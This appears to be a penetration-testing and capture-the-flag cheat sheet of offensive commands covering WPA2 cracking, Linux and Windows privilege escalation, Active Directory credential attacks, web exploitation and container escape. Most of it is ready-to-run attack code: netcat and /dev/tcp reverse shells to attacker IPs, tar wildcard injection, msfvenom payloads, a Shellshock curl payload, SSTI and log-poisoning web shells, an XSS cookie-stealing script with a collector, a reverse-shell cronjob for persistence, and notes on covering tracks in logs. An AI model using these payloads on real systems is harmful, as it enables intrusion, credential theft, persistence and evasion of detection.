To start with WPA2 Cracking make sure that your network interface is in monitor
ifconfig wlan0 down
iwfconfig wlan0 mode managed
ifconfig wlan0 up
Then run airmon-ng
airmon-ng check kill
airmon-ng start wlan0
To sniff different AP (Access Points)
airodump-ng wlan0
To start capturing traffic for a specific AP we use channel number -c
and MAC address --bssid
airodump-ng -c CHANNEL_NUMBER --bssid MAC_ADDRESS wlan0
Now in order to capture the 4-way handshake we need to start the above command with a parameter -w
so that the caputre file can be saved
airodump-ng -c CHANNEL_NUMBER --bssid MAC_ADDRESS -w FILENAME wlan0
Keep this running and launch the deauthentication attack on the AP with a specific host , you can do this to death all clients/host on the AP
aireplay-ng -0 0 -a MAC_ADDRESS -c HOST_NAME wlan0
When a client connects back to the host this will capture the handshake.To crack the password we need to use aircrack-ng
aircrack-ng FILENAME.cap -w path/towordlist/
When the passwords get cracked you can then go back to using managed mode on your
network interface
sudo systemctl restart NetworkManager.service
- ctrl+z
- stty raw -echo
- fg (press enter x2)
- export TERM=xterm , for using
clear
command
netdiscover -i <interface>
arp-scan -l
fping -a -g <ip>/24
nmap -n -sP <ip>/24
for i in $(seq 1 254); do ping -c1 -t 1 192.168.168.$i; done
- /usr/bin/script -qc /bin/bash 1&>/dev/null
- python -c 'import pty;pty.spawn("/bin/bash")'
- python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -u#-1 whoami
sudo -u#-1 <path_of_executable_as_other_user>
sudo -u <user> <command>
Connect to ftp on the machine
ftp user <ip>
After successfully logged in you can download all files with
mget *
Download files recusively
wget -r ftp://user:pass@<ip>/
smbclient -L \\\\<ip\\
listing all sharessmbclient \\\\<ip>\\<share>
accessing a share anonymouslysmbclient \\\\10.10.209.122\\<share> -U <share>
accessing a share with an authorized user
smbmap -u <username> -p <password> -H <ip>
smbget -R smb://<ip>/<share>
showmount -e <ip>
This lists the nfs sharesmount -t nfs <ip>:/<share_name> <directory_where_to_mount>
Mounting that share
- cronjobs for specific users are stored in
/var/spool/cron/cronjobs/
crontab -u <user> -e
Check cronjobs for a specific usercrontab -l
cronjob for the current usercat /etc/crontab
system wide cronjobs
- find . - perm /4000 (user id uid)
- find . -perm /2000 (group id guid)
getcap -r / 2>/dev/null
grep -rnw '/path/to/somewhere/' -e 'pattern'
chattr + i filename making file immutable
chattr -i filename making file mutable
lschattr filename Checking file attributes
scp file/you/want user@ip
:/path/to/store
python -m SimpleHTTPServer [port] By default will listen on 8000
python3 -m http.server [port] By default will listen on 8000
wget http://<ip>:port/<file>
#!/bin/bash
download() {
read proto server path <<< "${1//"/"/ }"
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
# send request
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
# read the header, it ends in a empty line (just CRLF)
while IFS= read -r line ; do
[[ "$line" == $'\r' ]] && break
done <&3
# read the data
nul='\0'
while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
printf "%s$nul" "$x"
done <&3
exec 3>&-
}
nc -l -p [port] > file
Receive file
nc -w 3 [ip] [port] < file
Send file
fcrackzip -u -D -p <path_to_wordlist> <archive.zip>
If you have asc
key which can be used for PGP authentication then
- john key.asc > asc_hash
- john asc_hash --wordlists=path_to_wordlist
- pgp --import key.asc
- pgp --decrypt file.pgp
- gpg --import key.asc
- gpg --decrypt file.pgp
jobs
Find it's job number
$ jobs
[1]+ Running sleep 100 &
$ kill %1
[1]+ Terminated sleep 100
ssh -L <map_blocked_port>:localhost:<port_that_is_blockd_> <username>@<ip>
ssh username@ip -i id_rsa(optional) -D 1337
Login as any user to see that it gets logged then try to login with a malicious php code
On attacker machine /chisel_1.7.6_linux_amd64 server -p <port to listen> --reverse
On target machine ./chisel client <attacker>:<attacker_listening_port> R:localhost:<port to forward from target>
ssh '<?php system($_GET['a']); ?>'@192.168.43.2
Then http://ip/page?a=whoami;
If we have permissions to run /usr/bin/ln as root we can onw the machine
echo 'bash' > root
chmod +x root
sudo /usr/bin/ln -sf /tmp/root /usr/bin/ln
sudo /usr/bin/ln
: set shell =/bin/sh
: shell
Then setting the PATH variable
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
When logging in with ssh we can using -t to enable pseudo-tty allocation and then we can change the PATH and SHELL varaible
When ever you see a cronjob running with a command cd /<user>/andre/backup tar -zcf /<folder>/filetar.gz *
go to that folder from which a backup is being created and running these command in that directory <br/ >
echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
If there is a certain command running in a binary example date
so we can create our own binary and add /bin/bash
to and path so it gets executed
export PATH=<path_where_binary_is>/:$PATH
If there's a port 5901 or 5900 open it's likely that it's for VNC , if you see .remote_secret
or .secret
it's the password for connecting for vnc
vncviewer -passwd remote_secret <ip>::<port>
We can also decrypt the password for vnc using https://github.com/jeroennijhof/vncpwd
./vncpwd remote_secret
- cat /etc/*release
- cat /etc/issue
- uname -a
- lsb_release -a
- Running Linpeas
- ss -tulpn (for ports that are open on the machine)
- netstat -tulpn
- ps -ef --forest
net user "USER_NAME" "PASS" /add
net user "USER_NAME" "NEWPASS"
net localgroup administrators "USER_NAME" /add
CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1.R Read
2.W Write
3.C Change
4.F Full Control
attrib +r filename add read only bit
attrib -r filename remove read only bit
attrib +h filename add hidden bit
attrib -h filename remove hidden bit
Show hidden file/folder
dir /a show all hidden files & folder
dir /a:d show only hidden folder
dir /a:h show only hidden files
certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe
powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe
powershell Invoke-WebRequest -Uri $ip -OutFile $filepath
- Running
winPEAS.exe
on the machine - Running
PowerUp.ps1
(https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) , documentation https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/. .\PowerUp.ps1
ThenInvoke-AllChecks
If you see that reg query HKLM\Software\Policies\Microsoft\Windows\Installer
returns 1 it means that we can install any windows program as SYSTEM
So to exploit this generate a windows payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi > shell.msi
Start a netcat listener
Transfer and run this on target machine
msiexec /quiet /qn /i shell.msi
Alternatively this can be done with metaslpoit's post exploitation module
exploit/windows/local/always_install/elevated
wmic logicaldisk get caption
- $file = Import-Clixml -Path <path_to_file>
- $file.GetNetworkCredential().username
- $file.GetNetworkCredential().password
evil-winrm -i 10.10.213.169 -u <USER> -p '<PASS>'
python psexec.py DOMAIN/USER:PASS@IP
https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication
crackmapexec <IP> -u 'Anonymous' -p ' ' --rid-brute
If this is enabled we can upload Printspoofer.exe
and place it if we have rights
PrintSpoofer.exe -i -c powershell.exe
If the system has PsExec.exe
open elevated cmd
.\PsExec.exe -i -s cmd.exe
If we have access to upload files , we can upload SCF (Shell Command File) in which we can specify our IP and share so that when it makes a request to it , it's going to authenticate to our share with credentials
[Shell]
Command=2
IconFile=\\IP\share\test.ico
[Taskbar]
Command=ToggleDesktop
Then launch responder to capture the NTLMv2 hash
responder -i tun0
powershell -ep bypass
load a powershell shell with execution policy bypassed
. .\PowerView.ps1
import the PowerView module
windapsearch -d 'domain.local' --dc IP -m users
python3 bloodhound.py -d 'DOMAIN_NAME' -u 'VALID_USERNAME' -p 'VALID_PASSWORD' -gc 'HOSTNAME.DOMAIN' -c all -ns IP
Import the json files in bloodhound GUI
- Upload
Sharphound.ps1
(https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - Then
. .\Sharhound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN-NAME -ZipFileName loot.zip
Domain name can be found by runningGet-ADDomain
and look for result
If we see any kerberoastable service account through bloodhound we can get that account's hash through this impacket script
python3 GetNPUsers.py DOMAIN/USERNAME:PASSWORD -dc-ip IP -request
- Download rubeus
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe
- Documentation
https://github.com/GhostPack/Rubeus
- Transfer rubeus.exe on targeted windows machine and run
.\Rubeus.exe kerberoast /outfile:C:\temp\hash.txt
to get a hash
If we find a user having DCsync rights or GetChangeAll privileges meaning to replicate AD secrets (NTDS.dit) we can dump NTDS.dit
python3 secretsdump.py 'DOMAIN/USERNAME':'PASSOWRD'@IP -just-dc-ntlm
https://cheatsheet.haax.fr/windows-systems/privilege-escalation/delegations/
https://github.com/dirkjanm/krbrelayx
- The path for binaries is
/usr/local/bin
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc <ip> <port> > /tmp/f
msfvenom -l payloads
msfvenom --list formats
run getgui -u [USER_NAME] -p [PASS]
use post/multi/manage/autoroute
Example you are on a host with IP 172.18.0.1
set RHOSTS 172.18.0.0
set SESSION <session_number
use auxiliary/server/socks_proxy
SET SOCKS 4a
exploit
Edit the port if you want to by default the SRVPORT
is set to 1080 , you can edit it on /etc/proxychains.conf
use auxiliary/scanner/portscan/tcp
set RHOSTS <subnet>/24
portfwd add -l <port_to_listen> -p <port_to_be_open> -r <targeted_ip
Using use admin/mssql/mssql_exec
we can execute code by specifying the credentials
Using sqsh -S IP -U <username> -P <password>
then EXEC master ..xp_cmdshell 'whoami'
./gitdumper.sh <location_of_remote_or_local_repostiory_having./.git> <destination_folder>
./extractor.sh <location_folder_having_.git_init> <extract_to_a_folder>
If you came across a php file , look for a .bak
as well i.e config.php.bak
https://github.com/intrudir/403fuzzer
python3 403fuzzer.py -hc 403 -u http://<ip>/page_that_you_want_to_bypass(which is usally a 403 foribben)
If we find cgi-bin
directory which exists on the web server it's good to fuzz for files in that directory and we find we can abuse this which is known as shell shock vulnerability to run bash commands on the web server through this application
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/PORT 0>&1' http://Remote IP/cgi-bin/file
use multi/http/apache_mod_cgi_bash_env_exec
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
Try to read local files like log files ,apache virtual host configuration file source code on the target machine
Virutal Hosts file : /etc/apache2/sites-available/000-default.conf
If we can read log files,we can poison them to get RCE
For apache /var/log/apache2/access.log
try to access the log and if we can then add <?php system($_GET['c']); ?>
in User-agent
For niginx /var/log/nginx/error.log
try to access the log and if we can then add <?php system($_GET['c']); ?>
in User-agent or try to add it in a file having a paramter make sure it's not being url encoded
To check if it's jinja test{{7*'7'}}
this would return 7777
Check for {{4*4}}
on the url http://IP/{{4*4}}
if it returns "16" as a result it is vulnerable to SSTI
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
Exploit
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
- https://chowdera.com/2020/12/20201221231521371q.html
- https://www.fatalerrors.org/a/0dhx1Dk.html
- https://hackmd.io/@Chivato/HyWsJ31dI
Have this php file hosted on your machine
<?php
header ('Location:http://domain');
if (isset($_GET["c"]))
{
$cookies = base64_decode(urldecode($_GET["c"]));
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");
}
?>
Run this script where you find web application is vulnerable to xss
<script>document.location='http://<ip>/cookie.php?c='+encodeURIComponent(btoa(document.cookie));</script>
Alternatively run this <br/ >
https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md
sqlmap -r request.txt --dbms=mysql --dump
wfuzz -c -z file,wordlist.txt --hh=0 http://<ip>/<path>/?date=FUZZ
If we want to use two payloads in the same request
wfuzz -c -w path/to/firs/wordlist -w /path/to/second/wordlist -u http://ip/FUZZ/FUZ2Z
This FUZ2Z will specify to use the second wordlist , we can do this upto FUZnZ (where n is number of the wordlist we specify)
- Check for possibility if there is a v1 , it is likely to be vulnerable to LFI
- Use wfuzz which is tool to fuzz for API end points or for parameter
wfuzz -u http://<ip>:<port>/<api-endpoint>\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404
Hereapi-endpoint
can be for example/api/v1/resources/books\?FUZZ\=.bash_history
"?" is before the parameter and FUZZ is telling to find a parameter and we are looking for.bash_hitory
as an example
bash -c "<bash_rev_shell>"
using wpscan we can find users or do some further enumeration of wordpress version
wpscan --url http://<ip>/wordpress -e u
Enumerate Userswpscan --url http://<ip>/wordpress -e ap --plugins-detection aggressive
Enumearte All plugins
To bruteforce passwords
wpscan --url <ip> -U user_file_path -P password_file_path
After logging into the wordpress dashboard , we can edit theme's 404.php page with a php revershell
http://<ip>/wordpress/wp-content/themes/twentytwenty/404.php
To get a RCE
- Goto
Appearance
->Editor
Select the 404.php template of the current theme and paste php reverse-shell. - Then navigate to
http://ip/wp-content/themes/twentyfifteen/404.php
(theme name can be twentytwenty for the latest one)
{
"key": "value",
"__proto__.block":
{
"type": "Text",
"line": "test;return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
"val": "THIS IS THE VALUE"
}
}
If we have access to /manager/html , we can upload a WAR payload (arz.war) and access it through http://ip/arz
If we nginx is being used as a reverse proxy to apache tom we can abuse it through Path Traversal Trough Reverse Proxy Mapping
https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/
- /usr/share/wordlists/dirb/big.txt
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir -u http://<ip>/ -w <path_to_wordlist>
gobuster dir -u http://<ip>/ -w <path_to_wordlist> -s "204,301,302,307,401,403"
(use status code if 200 is configured to respond on the web server to every get request)
feroxbuster -u http://<ip>/ -w <path_to_wordlist>
python3 dirsearch.py -u http://<ip>/ -w <path_to_text>
- /usr/share/wordlists/rockyou.txt
- /usr/share/wordlists/fasstrackt.txt
- using
crackstation
- using
seclists
When the login shows an error message
hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form '/login.php:username=^USE R^&password=^PASS^:F=Incorrect!' -t 64 -V -I
When the login doesn't show an error message so we can specify a success (s)
string which is shown after we login to a site , typically logout is shown to us.
hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form '/login.php:username=^USE R^&password=^PASS^:S=logout' -t 64 -V -I
- If you have a salted hash and you know the salt to crack it
hash:salt
This spiders the given url and finding keyowrds then makes a wordlists through it's findings
cewl.rb <ip>
If we want to generate a password list having length of 7 starting with "milo" and having 3 digit number at the end we can use % for numbers , @ for lowercase letters, , for uppercase letters and ^ for special characters
crunch 7 7 0123456789 -t milo%%% -o password.txt
wfuzz -c -w <path_to_wordlist> -u 'http://domain.com -H "Host: FUZZ.domain.com"
If there is a port 53 open on the machine you could do a zone transfer to get information about DNS records
`dig axfr @ <domain_name>
- strace
debugging / tamper with processes
- gbd
c/c++ debugger
- script - records terminal activites
- w /who
check current pts ,terminal device
- ps -t ps/pts-number
process monitoring
- script /dev/pts/pts-number
montior terminal
- cat /dev/urandom > /dev/pts/pts-number 2>/dev/null
prints arbitary text on terminal
- pkill -9 -t pts/pts-number
- Add this in root's crontab (crontab -e)
*/1 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/2222 0>&1'
Or you can add in system wide contab (nano /etc/crontab)
*/1 * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/2222 0>&1'
nano /etc/ssh/sshd_config
(change PORT 22 to any port you want also you can tinker with configuration file)
service sshd restart
(Restart SSH service to apply changes)
ssh user@ip -T
This -T will have some limiations , that you cannot run bash and some other commands but is helpful.
while [ 1 ]; do /root/chattr -i king.txt; done &
- echo "msg" > /dev/pts/pts-number
send message to specific user
- wall msg
boradcast message to everyone
- quser
- logoff id|user_name
ldapsearch -x -LLL -h localhost -D 'cn=USER,ou=users,dc=domain,dc=com' -w PASSWORD -b "dc=domain,dc
=com"
11.11. Covering our Tracks
The final stages of penetration testing involve setting up persistence and covering our tracks. For today's material, we'll detail the later as this is not mentioned nearly enough.
During a pentesting engagement, you will want to try to avoid detection from the administrators & engineers of your client wherever within the permitted scope. Activities such as logging in, authentication and uploading/downloading files are logged by services and the system itself.
On Debian and Ubuntu, the majority of these are left within the "/var/log directory and often require administrative privileges to read and modify. Some log files of interest:
"/var/log/auth.log" (Attempted logins for SSH, changes too or logging in as system users:)
<img src="https://imgur.com/37aTxnI.png/>
"/var/log/syslog" (System events such as firewall alerts:)
<img src="https://imgur.com/k7scyUP.png/>
"/var/log/<service/"
For example, the access logs of apache2
/var/log/apache2/access.log
<img src="https://imgur.com/y8Rin3h.png/>
To see list of conatiner/images on a remote machine
docker -H <ip>:2375 images
To see list of currently running images/conatiner on a remote machine
docker -H <ip>:2375 ps -a
To start a container from a remote machine
docker -H <ip>:2375 exec -it <container-id> /bin/sh
To start a container from a remote machine using name and tags
docker -H <ip>:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh
Break out of docker container
docker -H tcp://<ip>:2375 run --rm -it -v /:/host <container_name> chroot /host bash
If docker.sock is on conatiner , upload static docker binary
./docker -H unix:///var/run/docker.sock images
./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host
- If we have a privilege docker and we can run command
fdisk -l
and view storage on the machine then we can mount the host file system
mount /dev/sda<x> /mnt/host
- We can look for container capabilites on docker with
capsh --print
and exploit it SYS_MODULE
- There's another exploit realted to docker (CVE-2019-5736)
https://github.com/Frichetten/CVE-2019-5736-PoC
kubectl get pods
kubectl get namespaces
kubectl get pods -n namespace
kubectl get secrets -n kube-system
kubectl describe secret <secret_name> -n <namespace_name>
kubectl get -o json pod <pod_name> -n <namespace_name>